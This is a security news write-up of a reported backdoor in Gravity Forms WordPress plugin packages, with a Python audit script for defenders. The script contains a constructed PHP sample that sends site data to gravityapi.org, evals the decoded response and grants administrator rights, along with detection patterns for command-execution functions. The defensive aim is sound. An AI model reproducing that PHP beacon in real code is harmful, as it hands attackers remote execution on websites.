Researchers Discover Malicious Code in WordPress GravityForms Plugin

Security researchers at Patchstack recently uncovered a supply chain compromise of the widely used WordPress plugin Gravity Forms: malicious code was found inside plugin packages distributed by the vendor itself. Gravity Forms is a popular form builder plugin that powers forms on websites of every size, from small blogs to large enterprises, worldwide.

A Hidden Threat in a Trusted Plugin

According to the researchers' findings, certain versions of Gravity Forms downloaded directly from the official site contained malicious code. This is a targeted supply chain attack: rather than exploiting a bug in the plugin, the attackers injected their code into the legitimate package the vendor distributes, so it arrived through a channel users already trust. The compromised plugin could then communicate with attacker-controlled servers, execute commands remotely, and give the attacker unauthorized access to affected websites.

The malicious code was embedded within core plugin files, and a secondary backdoor was also identified. That backdoor lets attackers create administrator accounts, upload arbitrary files, or list server directories, all without the site owner's knowledge.

Once installed, the compromised plugin connects to a newly registered domain, gravityapi.org, which was created only days before the attack. It sends information about the website, such as its URL, WordPress version and server details, to this malicious domain. The attacker can then respond with malicious code, which the plugin decodes and executes on the server. This is remote command execution: the attacker decides what runs without touching the site's files again, and the beacon itself looks much like ordinary plugin telemetry or update traffic, which is why it is easy to miss.

Additionally, the backdoor can be triggered through specific requests, letting an attacker create new admin accounts, delete users, upload files, or scan server directories, all remotely and silently.

Gravity Forms is used by a vast number of websites; estimates suggest over one million active installations worldwide. It is a premium plugin licensed directly from the vendor and is not distributed through the official WordPress.org plugin repository. Obtaining a plugin from an official channel, whether WordPress.org or the vendor's own site, generally adds a layer of trust, but as this incident shows, it is not a guarantee.

Users or website owners running the Gravity Forms plugin should:

  • Update Plugin: The developer has released a clean updated version (2.9.13) that replaces the compromised packages. Learn more about updating on the official docs.
  • Audit Site: Check for unfamiliar users, files or code snippets, especially in core plugin files such as common.php, notification.php and class-settings.php. Updating alone does not undo an administrator account or uploaded file the backdoor may already have created. Security tools or services can assist with in-depth scanning.
  • Monitor Network Traffic: Look for unusual outbound connections from the web server to suspicious domains such as gravityapi.org or gravityapi.io.
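The audit and traffic-monitoring steps above can be scripted. The following is an added example written for this article, not code from Patchstack or from Gravity Forms. It takes only the indicators the write-up names (the two domains and the affected file names) from the advisory; the PHP function-name patterns it also looks for (decode-then-eval, command execution, administrator role assignment) are general backdoor heuristics that I am assuming here, and they will flag some legitimate code, so treat hits as leads to inspect rather than proof. The sample plugin files and log lines are constructed stand-ins, not the real payload.

```python
"""Heuristic audit for the Gravity Forms supply chain compromise.

Added example, not Patchstack's or Gravity Forms' own code. Only IOC_DOMAINS
and AFFECTED_FILES come from the write-up; the PATTERNS are assumed heuristics.
"""
import os
import re
from dataclasses import dataclass

# Indicators taken from the write-up
IOC_DOMAINS = ("gravityapi.org", "gravityapi.io")
AFFECTED_FILES = ("common.php", "notification.php", "class-settings.php")

# Heuristic patterns (assumptions, not from the advisory). They describe the
# behaviours the write-up attributes to the implant: a beacon that decodes and
# executes a server response, command execution, and promotion to administrator.
PATTERNS = {
    "ioc-domain": re.compile("|".join(re.escape(d) for d in IOC_DOMAINS)),
    "decode-and-eval": re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("),
    "command-exec": re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("),
    "admin-role": re.compile(r"set_role\s*\(\s*['\"]administrator['\"]"),
}


@dataclass
class Finding:
    path: str
    line: int
    rule: str
    text: str


def scan_source(path, text):
    """Return one Finding per (line, rule) hit in a PHP source string."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in PATTERNS.items():
            if rx.search(line):
                findings.append(Finding(path, lineno, rule, line.strip()))
    return findings


def scan_tree(root):
    """Walk a plugin directory (e.g. wp-content/plugins/gravityforms) and scan every .php file."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(path, fh.read()))
    return findings


def suspicious_egress(log_lines):
    """Return outbound-connection log lines that touch an IOC domain."""
    return [line for line in log_lines if any(d in line for d in IOC_DOMAINS)]


# Constructed sample inputs (not real plugin code, not real logs)
CLEAN_PHP = "<?php\nfunction gf_format_date($ts) { return date('Y-m-d', $ts); }\n"
TAINTED_PHP = (
    "<?php\n"
    "$u = 'https://gravityapi.org/sites';\n"
    "$r = wp_remote_post($u, array('body' => $site_info));\n"
    "eval(base64_decode($r['body']));\n"
    "$user = new WP_User($id); $user->set_role('administrator');\n"
)
SAMPLE_LOG = [
    "t=1 host=wp-web01 proc=php-fpm POST https://api.wordpress.org/plugins/update-check/1.1/ 200",
    "t=2 host=wp-web01 proc=php-fpm POST https://gravityapi.org/sites 200",
    "t=3 host=wp-web01 proc=php-fpm GET https://www.gravityforms.com/ 200",
]

if __name__ == "__main__":
    for f in scan_source("common.php", TAINTED_PHP):
        print(f"{f.path}:{f.line} [{f.rule}] {f.text}")
    for line in suspicious_egress(SAMPLE_LOG):
        print("egress:", line)
```

Run scan_tree() against the plugin directory and against any copy of the installer zip you still have, and feed suspicious_egress() whatever outbound logs your proxy, DNS resolver or host firewall produces. Both domains are matched as plain substrings on purpose, so a hit on a lookalike such as a subdomain still surfaces.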

Protecting your website is an ongoing process. Supply chain attacks can happen even with trusted vendors, so vigilance and rigorous update and security practices are essential.

